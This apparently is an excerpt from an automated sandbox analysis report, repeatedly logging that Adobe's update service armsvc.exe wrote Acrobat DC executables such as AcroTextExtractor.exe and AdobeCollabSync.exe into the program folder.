              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
